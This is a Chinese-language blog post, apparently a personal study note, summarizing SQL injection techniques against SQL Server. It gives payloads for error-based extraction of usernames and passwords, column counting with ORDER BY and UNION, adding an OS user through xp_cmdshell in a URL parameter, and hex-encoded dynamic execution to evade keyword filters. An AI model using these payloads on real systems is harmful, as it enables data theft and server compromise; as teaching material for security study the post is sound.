<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|consolas:300,300italic,400,400italic,700,700italic|consolas:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="SQL Injection," />








  <link rel="shortcut icon" type="image/x-icon" href="/images/tubiao.ico?v=5.1.0" />






<meta name="description" content="针对 SQL Server 2008、MySQL5.1 和 Oracle 11g 三种数据库，简单归纳注入技巧。本篇为第一部分——SQL Server。">
<meta name="keywords" content="SQL Injection">
<meta property="og:type" content="article">
<meta property="og:title" content="常见数据库注入技巧——SQL Server">
<meta property="og:url" content="http://a2chitect.cn/2017/11/19/常见数据库注入技巧——SQL Server/index.html">
<meta property="og:site_name" content="Architect&#39;s Blog">
<meta property="og:description" content="针对 SQL Server 2008、MySQL5.1 和 Oracle 11g 三种数据库，简单归纳注入技巧。本篇为第一部分——SQL Server。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2017-11-19T09:19:28.804Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="常见数据库注入技巧——SQL Server">
<meta name="twitter:description" content="针对 SQL Server 2008、MySQL5.1 和 Oracle 11g 三种数据库，简单归纳注入技巧。本篇为第一部分——SQL Server。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://a2chitect.cn/2017/11/19/常见数据库注入技巧——SQL Server/"/>





  <title> 常见数据库注入技巧——SQL Server | Architect's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Architect's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://a2chitect.cn/2017/11/19/常见数据库注入技巧——SQL Server/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Architect">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/touxiang.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Architect's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                常见数据库注入技巧——SQL Server
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-11-19T14:40:15+08:00">
                2017-11-19
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>针对 SQL Server 2008、MySQL5.1 和 Oracle 11g 三种数据库，简单归纳注入技巧。本篇为第一部分——SQL Server。</p>
<a id="more"></a>
<h3 id="SQL-Server"><a href="#SQL-Server" class="headerlink" title="SQL Server"></a>SQL Server</h3><h4 id="通过报错提取信息"><a href="#通过报错提取信息" class="headerlink" title="通过报错提取信息"></a>通过报错提取信息</h4><p>SQL Server 的错误提示十分详细，可以通过引发报错提取需要的信息。</p>
<h5 id="通过-having-子句枚举表和列"><a href="#通过-having-子句枚举表和列" class="headerlink" title="通过 having 子句枚举表和列"></a>通过 having 子句枚举表和列</h5><p>假设数据库结构和查询语句如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">//表结构</div><div class="line">create table users（</div><div class="line">	id int not null identity(1,1),</div><div class="line">	username varchar(20) not null,</div><div class="line">	password varchar(20) not null,</div><div class="line">	privs int not null,</div><div class="line">	email varchar(50)</div><div class="line">)</div><div class="line"></div><div class="line">//查询语句</div><div class="line">select * from users where username=&apos;root&apos;</div></pre></td></tr></table></figure>
<p>注入<code>&#39;having 1=1--</code>语句，由于SQL语言中 having 子句用于过滤组，因此会返回类似如下的错误：</p>
<p><strong>“选择列表中的列“users.id”无效，因为该列未包含在聚合函数或 GROUP BY 子句中。”</strong></p>
<p>得到表名 users 和其中的列名ID。</p>
<p>将 user.id 包含在 group by 子句中，即<code>&#39; group by users.id having 1=1--</code>,再次注入，返回报错：</p>
<p><strong>“选择列表中的列“users.username”无效，因为该列未包含在聚合函数或 GROUP BY 子句中。”</strong></p>
<p>得到第二个列名。依此类推，即可枚举当前表中所有列名。</p>
<h5 id="利用数据类型错误提取数据"><a href="#利用数据类型错误提取数据" class="headerlink" title="利用数据类型错误提取数据"></a>利用数据类型错误提取数据</h5><p>最常用的数据类型错误即是数字与字符串的类型错误。在 SQL Server 中，当将字符串与非字符串比较或者试图将字符串转换为不兼容类型时会抛出异常。有趣的是报错中会把涉及的字符串完整地输出。可以用几种方式来实现：</p>
<ol>
<li>嵌入子查询</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">//比较数字和字符串</div><div class="line">select * from users where username=&apos;root&apos; and password=&apos;root&apos; and 1&gt;(select top 1 username from users)</div></pre></td></tr></table></figure>
<p>错误提示：<strong>在将varchar值‘root’转换成数据类型 int 时失败。</strong></p>
<p>利用此方法递归查询可得所有username：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">select * from users where username=&apos;root&apos; and password=&apos;root&apos; and</div><div class="line">	1&gt;(select top 1 username from users where username not in(&apos;root&apos;))</div></pre></td></tr></table></figure>
<ol>
<li>CONVERT( ) 和 CASE( ) 函数（强制类型转换）</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">select * from users where username=&apos;root&apos; and password=&apos;root&apos; and</div><div class="line">	1=CONVERT(int, (select top 1 users.username from users))</div></pre></td></tr></table></figure>
<p>可以使用 FOR XML PATH 语句将查询的数据生成XML，代替重复递归操作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">select * from users where username=&apos;root&apos; and password=&apos;root&apos; and</div><div class="line">	1=CONVERT(int, (select stuff((select &apos;,&apos;+ users.username,&apos;|&apos; + users.password from users for xml path(&apos;&apos;)),1,1,&apos;&apos;)))</div></pre></td></tr></table></figure>
<p>抛出异常：<strong>“在将 nvarchar 值 ‘root|root,admin|admin,xxser|xxser’ 转换成数据类型 int 时失败。” </strong></p>
<h4 id="获取元数据"><a href="#获取元数据" class="headerlink" title="获取元数据"></a>获取元数据</h4><p>SQL Server 中常见的系统数据库视图见下表。</p>
<table>
<thead>
<tr>
<th style="text-align:center">数据库视图</th>
<th style="text-align:center">说 明</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center"><strong>sys.databases</strong></td>
<td style="text-align:center">SQL Server 中的所有数据库</td>
</tr>
<tr>
<td style="text-align:center"><strong>sys.sql_logins</strong></td>
<td style="text-align:center">SQL Server 中的所有登录名</td>
</tr>
<tr>
<td style="text-align:center"><strong>information_schema.tables</strong></td>
<td style="text-align:center">当前用户数据库中的表</td>
</tr>
<tr>
<td style="text-align:center"><strong>information_schema.columns</strong></td>
<td style="text-align:center">当前用户数据库中的列</td>
</tr>
<tr>
<td style="text-align:center">sys.all_columns</td>
<td style="text-align:center">用户定义对象和系统对象的所有列的联合</td>
</tr>
<tr>
<td style="text-align:center">sys.database_principals</td>
<td style="text-align:center">数据库中每个权限或列异常权限</td>
</tr>
<tr>
<td style="text-align:center">sys.database_files</td>
<td style="text-align:center">存储在数据库中的数据库文件</td>
</tr>
<tr>
<td style="text-align:center">sysobjects</td>
<td style="text-align:center">数据库中创建的每个对象（例如约束、日志、存储过程）</td>
</tr>
</tbody>
</table>
<p>从这些视图中可以获得有价值的元数据，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">//获得当前数据库的表名</div><div class="line">select table_name from information_schema.tables</div><div class="line">//获得当前表的列名</div><div class="line">select column_name from information_schema.columns where table_name=&apos;student&apos;</div></pre></td></tr></table></figure>
<h4 id="Order-by-子句"><a href="#Order-by-子句" class="headerlink" title="Order by 子句"></a>Order by 子句</h4><p>Order by 子句常用于探测表的列数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">//正常语句</div><div class="line">select id,username,password from users where id=1</div><div class="line"></div><div class="line">//不断增加 ORDER BY 后面的列标号</div><div class="line">select id,username,password from users where id=1 order by 1</div><div class="line">select id,username,password from users where id=1 order by 2</div><div class="line">select id,username,password from users where id=1 order by 3</div><div class="line">......</div></pre></td></tr></table></figure>
<p>假设 users 表共有三列，则当 order by 4 时就会报错：</p>
<p><strong>“ORDER BY 位置号 4 超出了选择列表中项数的范围”</strong></p>
<h4 id="UNION-查询"><a href="#UNION-查询" class="headerlink" title="UNION 查询"></a>UNION 查询</h4><p>UNION 查询要遵循两个基本规则：</p>
<ul>
<li>所有查询中列数必须相同</li>
<li>数据类型必须兼容</li>
</ul>
<h5 id="union-查询探测列数"><a href="#union-查询探测列数" class="headerlink" title="union 查询探测列数"></a>union 查询探测列数</h5><p>除了用 order by 语句推断列数外，还可以使用 union 查询：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">//正常语句</div><div class="line">select id,username,password from users where id=1</div><div class="line"></div><div class="line">//不断增加ORDER BY后面的列标号</div><div class="line">select id,username,password from users where id=1 union select null</div><div class="line">select id,username,password from users where id=1 union select null,null</div><div class="line">select id,username,password from users where id=1 union select null,null,null</div><div class="line">......</div></pre></td></tr></table></figure>
<p>若 null 的数量与表中字段数不同，则会报错：<br><strong>“使用 UNION、INTERSECT 或 EXCEPT 运算符合并的所有查询必须在其目标列表中有相同数目的表达式”</strong></p>
<ul>
<li><p><code>union select null,null,...</code> 和 <code>union select 1,2,3</code>  的区别：</p>
<p>null和其他任何数据类型都不会发生不兼容的情况，而数字型与其他类型（例如字符串）就会出现不兼容，因此推荐使用 null ；是否会出现类型异常也与数据库种类有关，MySQL中使用1,2,3…就不会出现异常，而 Oracle 和 SQL Server 则相反。</p>
</li>
</ul>
<h5 id="union-查询敏感信息"><a href="#union-查询敏感信息" class="headerlink" title="union 查询敏感信息"></a>union 查询敏感信息</h5><p>假设已得知列数为 4，可以使用如下语句注入：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">......id=1 union select &apos;x&apos;,null,null,null from sysobjects where xtype=&apos;U&apos;</div></pre></td></tr></table></figure>
<p>如果第一行数据类型不匹配，数据库将会报错，可递归查询直至语句正常执行：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">......id=1 union select null,&apos;x&apos;,null,null from sysobjects where xtype=&apos;U&apos;</div><div class="line">......id=1 union select null,null,&apos;x&apos;,null from sysobjects where xtype=&apos;U&apos;</div><div class="line">......</div></pre></td></tr></table></figure>
<p>语句执行正常，代表数据类型兼容，就可以将 x 换为 SQL 语句，查询敏感信息。</p>
<h4 id="利用系统函数"><a href="#利用系统函数" class="headerlink" title="利用系统函数"></a>利用系统函数</h4><p>所有的数据库系统都会提供很多内置的系统函数，这些函数中有些可以直接返回数据库名、用户名等敏感信息，有些可以对数据进行处理（例如：字符串连接、截取；ASCII码转换等）。这些系统函数为 SQL 注入提供了很大的便利。</p>
<p>SQL Server 中的常用函数表如下：</p>
<table>
<thead>
<tr>
<th style="text-align:center">函 数</th>
<th style="text-align:center">说 明</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">suser_name()</td>
<td style="text-align:center">返回用户的登录标识名</td>
</tr>
<tr>
<td style="text-align:center">user_name()</td>
<td style="text-align:center">基于指定的标识号返回数据库用户名</td>
</tr>
<tr>
<td style="text-align:center">db_name()</td>
<td style="text-align:center">返回数据库名称</td>
</tr>
<tr>
<td style="text-align:center">is_number(‘db_owner’)</td>
<td style="text-align:center">是否为数据库角色</td>
</tr>
<tr>
<td style="text-align:center">convert(int,’5’)</td>
<td style="text-align:center">数据类型转换</td>
</tr>
<tr>
<td style="text-align:center">stuff()</td>
<td style="text-align:center">字符串截取</td>
</tr>
<tr>
<td style="text-align:center">ascii()</td>
<td style="text-align:center">取ASCII码</td>
</tr>
<tr>
<td style="text-align:center">char()</td>
<td style="text-align:center">根据ASCII码取字符</td>
</tr>
<tr>
<td style="text-align:center">getdate()</td>
<td style="text-align:center">返回日期</td>
</tr>
<tr>
<td style="text-align:center">count()</td>
<td style="text-align:center">返回组中总条数</td>
</tr>
<tr>
<td style="text-align:center">cast()</td>
<td style="text-align:center">将一种数据类型的表达式显式转换为另一种数据类型</td>
</tr>
<tr>
<td style="text-align:center">rand()</td>
<td style="text-align:center">返回随机值</td>
</tr>
<tr>
<td style="text-align:center">is_srvrolemember()</td>
<td style="text-align:center">指定 SQL Server 登录名是否为指定服务器角色的成员</td>
</tr>
</tbody>
</table>
<h4 id="利用存储过程"><a href="#利用存储过程" class="headerlink" title="利用存储过程"></a>利用存储过程</h4><p>存储过程（Stored Procedure）是在大型数据库系统中为完成特定功能的一组 SQL 语句集，存储在数据库中，经过第一次编译后再次调用不需要再次编译，用户通过指定存储过程的名字并给出参数（如果该存储过程带有参数）来执行它。</p>
<p>常见的存储过程功能有：执行系统命令、查看注册表、读取磁盘目录等。</p>
<p>攻击者最常用的存储过程是 <code>xp_cmdshell</code> ,允许用户执行操作系统命令，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http://www.secbug.org/test.aspx?id=1;exec xp_cmdshell &apos;net user test test /add&apos;</div></pre></td></tr></table></figure>
<p>使用存储过程，必须先拥有相应的权限。</p>
<h4 id="动态执行"><a href="#动态执行" class="headerlink" title="动态执行"></a>动态执行</h4><p>SQL Server 支持动态执行语句，用户可以提交一个字符串来执行 SQL 语句，例如：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">exec(&apos;select username,password from users&apos;)</div><div class="line"></div><div class="line">//绕过关键词过滤</div><div class="line">exec(&apos;selec&apos;+&apos;t userneme,password fro&apos;+&apos;m users&apos;)</div></pre></td></tr></table></figure>
<p>可以通过定义十六进制的SQL语句，使用 exec 函数执行，可以绕过对单引号的过滤机制：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">declare @query varchar(888)</div><div class="line">select @query=0x73656C6563742031</div><div class="line">exec(@query)</div><div class="line"></div><div class="line">//以上命令连接起来</div><div class="line">declare/**/@query/**/varchar(888)/**/select/**/@query=0x73656C6563742031/**/exec(@query)</div></pre></td></tr></table></figure>
<p>（有待更多补充和实践）</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL-Injection/" rel="tag"><i class="fa fa-tag"></i> SQL Injection</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/10/由汉诺塔想到的/" rel="next" title="由汉诺塔想到的">
                <i class="fa fa-chevron-left"></i> 由汉诺塔想到的
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/11/29/Kali-Linux-2017-安装配置/" rel="prev" title="Kali Linux 2017 安装配置">
                Kali Linux 2017 安装配置 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/touxiang.jpg"
               alt="Architect" />
          <p class="site-author-name" itemprop="name">Architect</p>
           
              <p class="site-description motion-element" itemprop="description">Gather ye rosebuds while ye may.</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://caligo.cc/" title="Caligo" target="_blank">Caligo</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.xieldy.cn/" title="Xieldy" target="_blank">Xieldy</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://barriery.cn/" title="Barriery" target="_blank">Barriery</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL-Server"><span class="nav-number">1.</span> <span class="nav-text">SQL Server</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#通过报错提取信息"><span class="nav-number">1.1.</span> <span class="nav-text">通过报错提取信息</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#通过-having-子句枚举表和列"><span class="nav-number">1.1.1.</span> <span class="nav-text">通过 having 子句枚举表和列</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#利用数据类型错误提取数据"><span class="nav-number">1.1.2.</span> <span class="nav-text">利用数据类型错误提取数据</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取元数据"><span class="nav-number">1.2.</span> <span class="nav-text">获取元数据</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Order-by-子句"><span class="nav-number">1.3.</span> <span class="nav-text">Order by 子句</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#UNION-查询"><span class="nav-number">1.4.</span> <span class="nav-text">UNION 查询</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#union-查询探测列数"><span class="nav-number">1.4.1.</span> <span class="nav-text">union 查询探测列数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#union-查询敏感信息"><span class="nav-number">1.4.2.</span> <span class="nav-text">union 查询敏感信息</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用系统函数"><span class="nav-number">1.5.</span> <span class="nav-text">利用系统函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用存储过程"><span class="nav-number">1.6.</span> <span class="nav-text">利用存储过程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#动态执行"><span class="nav-number">1.7.</span> <span class="nav-text">动态执行</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Architect</span>
</div>


<!--<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>
-->


<p>Hosted by <a href="https://pages.coding.me" style="font-weight: bold">Coding Pages</a></p>
        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  





  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  






  





  

  

  

  

</body>
</html>
